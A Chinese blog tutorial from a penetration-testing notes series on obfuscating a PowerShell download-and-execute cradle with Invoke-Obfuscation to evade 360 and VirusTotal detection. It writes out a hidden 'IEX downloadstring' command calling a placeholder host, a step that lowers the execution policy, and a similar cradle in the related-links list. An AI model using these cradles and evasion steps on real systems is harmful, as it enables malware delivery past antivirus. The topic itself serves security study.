【渗透测试笔记】之【免杀工具——使用Invoke-Obfuscation代码混淆免杀powershell】_yetanotherobfuscator(3)

最新推荐文章于 2024-09-05 11:32:26 发布
最新推荐文章于 2024-09-05 11:32:26 发布
阅读量93 收藏
点赞数 2
分类专栏: 程序员 文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84969310/article/details/138793008
版权 

2. 下载并用powershell进入项目目录执行:`Import-Module .\Invoke-Obfuscation.psd1;Invoke-Obfuscation`  
 如果报错请先执行:`Set-ExecutionPolicy Unrestricted`  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210706161817618.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)
3. 输入要混淆的PS:`set scriptblock 'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:80/b'))"'`  
 (设置ps文件:`set scriptpath C:\0_poweshell\msf-crow.ps1`)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707101436777.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)
4. 输入`ENCODING`选择要编码的方式:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210706163018114.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)


## 0x03 编码测试


### 1. ASCII


1. 选择1:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707101641940.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)
2. 输出:`out PowerShellCodeASCII.ps1`  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707102038684.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)
3. 免杀与上线测试


* 360静态查杀:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707102125969.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)
* 360动态查杀:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707102310435.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707102341857.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)
* VT:5/58  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/2021070710421179.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)


### 2. Hex


1. `undo` 撤销上次命令:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707102641367.png)
2. 编码并输出:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707102813576.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)
3. 免杀与上线测试


* 360静态查杀:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707103208444.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)
* 360动态查杀:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707103341749.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707103424996.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)
* VT:9/59  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707104418774.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)


### 3. Octal


1. 编码并输出:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707103526543.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)
2. 免杀与上线测试


* 360静态查杀:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707103644109.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)
* 360动态查杀:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707103857624.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707103940710.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)
* VT:7/58![在这里插入图片描述](https://img-blog.csdnimg.cn/20210707104752548.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODc0NjQ1,size_16,color_FFFFFF,t_70)


## 最后

**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**

**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**

**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**

![img](https://img-blog.csdnimg.cn/img_convert/484aaf454f383486f9b4ad68238d0b1e.png)

![img](https://img-blog.csdnimg.cn/img_convert/2e4a4907792c6e7d3374f9f46d9660e9.png)

![img](https://img-blog.csdnimg.cn/img_convert/eea02dbbe1cb815c4c502877e457b98a.png)

![img](https://img-blog.csdnimg.cn/img_convert/df9a521dd1ebfac82d987719ffa7cd2b.png)

![img](https://img-blog.csdnimg.cn/img_convert/ac7fbd818ccd311f6131e617fd6cfa6e.png)

 

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**

net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**
2401_84969310
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用Invoke-Obfuscation混淆ps文件实现上线/VT免杀率3/55
AerYinan的博客
01-12 9690
利用Invoke-Obfuscation混淆ps文件实现上线/VT免杀率3/55
利用Invoke-Obfuscation工具进行Powershell恶意脚本免杀
m0_62239233的博客
04-18 826
记录渗透学习中的实验过程。
免杀powershell
zhangshuaiijie的博客
06-24 251
下载Invoke-Obfuscation:https://github.com/danielbohannon/Invoke-Obfuscation。进入Invoke-Obfuscation目录,在powershell中执行。我看了好几篇去年的文章还是能过的,不过现在火狐和360都不能过去。不过在virscan和VirusTotal上面报毒还是很少的。如果报错,在管理员权限下powershell执行。
免杀对抗-Powershell-混淆无文件
m0_62172162的博客
04-25 857
免杀对抗-Powershell-混淆无文件
第109天:免杀对抗-PowerShell&混淆&分离加载&特征修改&EXE生成&填充替换
qq_46081990的博客
07-21 469
代码】第109天:免杀对抗-PowerShell&混淆&分离加载&特征修改&EXE生成&填充替换。
免杀 | powershell免杀的几种简单方式
weixin_66717977的博客
03-13 625
免杀对抗 | powershell免杀 | 免杀技术
Powershell免杀
mingyqf的博客
05-11 2445
Powershell免杀 本文作者:Chenw 本文链接:https://www.cnblogs.com/chen-w/p/14726549.html 0x01 前言 前几天搞一个站的时候,进入内网,想让内网一台机子powershell上线。然后被杀软拦截了,极其的不讲武德,想着找我极强的朋友们白嫖个免杀的方法。 后面还是没有白嫖到,只好自己去研究学习一下了(针对CS的进行免杀,后面思想大同小异)于是做了这个小笔记。 0x02 Powershell免杀思路 先介绍一下powershell木马最常用的方式
Invoke-Obfuscation-Bypass + PS2EXE 绕过主流杀软1
08-03
在描述中提到,通过将 Invoke-Obfuscation 应用到 C# 生成的 PowerShell 脚本上,然后使用 PS2EXE 工具将其转换为exe文件,可以有效地绕过某些主流杀软的检测。例如,在测试过程中,混淆后的脚本不再被某60云查杀和...
2020.04-远控免杀从入门到实践(6)-代码篇-Powershell1
08-03
在这里,我们将讨论使用 Powershell 实现免杀的技术,包括使用 Invoke-Shellcode、Invoke-Obfuscation 等技术来躲避安全软件和防火墙的检测。 4. Powershell 的安全风险 Powershell 是一个功能强大的 ...
obfuscation-stuff:源代码混淆和二进制混淆,多种语言和多种平台。 包括250多个工具和600多个帖子
05-16
invoke-obfuscation -> (1)工具 (7)文章 (9) 工具 (33) 文章 JavaScript javascript-obfuscator -> (7)工具 baffle -> (1)工具 jstillery -> (1)工具 (16) 工具 (64) 文章 LLVM obfuscator -> (7)工具 armariris -> ...
使用PowerShellInvoke-SqlCmd
culuo4781的博客
07-26 1937
PowerShell features many one-line commands for working with SQL Server, one of which is Invoke-SqlCmd. This tool can be useful in many development contexts where we need to quickly execute script...
Ladon九种PowerShell命令混淆加密免杀方法
K8哥哥
11-02 1705
九种方式随机混淆PowerShell代码,防止管理员轻易还原,至少比默认明文或Base64隐蔽。 Base64就不说了是个人都能解,一是常用,二是工具多,管理员懂解很正常,所以不推荐。 Ladon提供的混淆方法,每点一次按钮就随机会生成不同的命令,但是执行的都是同个功能 管理员想反查就得每一条都研究如何解密,给管理员增加难度,就是给自己增加控制时间。 更新功能 GUI 2020.10.18 [+] PowerShell转EXE,EXE转PowerShell EXE->Powershell PowerS
我的powershell免杀之路
mingyqf的博客
05-17 1938
我的powershell免杀之路 ​ 原创 tubai
PowerShell脚本免杀/bypass/绕过杀毒软件
wdsj_xh的博客
05-12 2332
项目地址:https://github.com/the-xentropy/xencrypt 原文链接:http://caidaome.com/?post=246 Xencrypt是一个PowerShell加密程序,以达到某些场景下免杀/bypass/绕过杀毒软件的效果。厌倦了浪费大量时间混淆诸如invoke-mimikatz之类的PowerShell脚本,以至于无论如何都无法检测到它们?如果您可以采用任何脚本并自动且几乎不费力地生成几乎无限数量的变体来击败基于签名的防病毒检测机制,那岂不是很棒吗?.
powershell命令语句混淆免杀(bypass火绒)
weixin_43899495的博客
02-04 1301
基础混淆 原始语句(不免杀powershell “IEX (New-Object System.Net.WebClient).DownloadString(‘http://127.0.0.1/a.ps1’)" AV:火绒 混淆测试 New-Object System.Net 类可以直接替换成 New-Object Net 类(不免杀powershell "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/a.ps1')"
powershell免杀思路分析
mingyqf的博客
12-14 3131
powershell免杀思路分析 写在前面 powershell做为微软windows系统自带的软件包,具有十分强大的功能,Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的功能,在IT/系统管理员间得到普及。总的特点来说就是:方便、有效和隐蔽。举例来说,利用这些合法工具可以让威胁活动混在正常的网络流量或IT/系统管理工作内,也让这些恶意威胁能够留下较少的痕迹,使得侦测更加困难。在经过各种变形、加密、混淆、恶意文件放在远程服
维度不固定的多维数组形参笔记
最新发布
H2z1220的博客
09-05 210
假如我有多个元素个数都不一致的多维数组都需要调用这个函数进行处理,这个形参问题就凸显出来了,总不能创建N个不同的函数来进行处理吧?这样也太繁琐了,而且也适用度不高。这个函数可以传入多维数组,但元素个数必须是固定的,假如传入一个str[][20],元素个数不一样的数组,那么这个函数就不适用了,且会报错。所有数据在存储空间里面都是有地址的,那么就可利用指针寻址来获取到相应的数据。在查找了一些资料后受到了一点启发。而这里也可利用指针来指向多维数组。
如何下载Invoke-Obfuscation
04-06
1. 打开GitHub页面:https://github.com/danielbohannon/Invoke-Obfuscation ... 3. 解压缩下载的压缩包。 4. 在解压缩后的文件夹中找到“Invoke-Obfuscation.psd1”文件...6. 下载完成,可以开始使用Invoke-Obfuscation
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值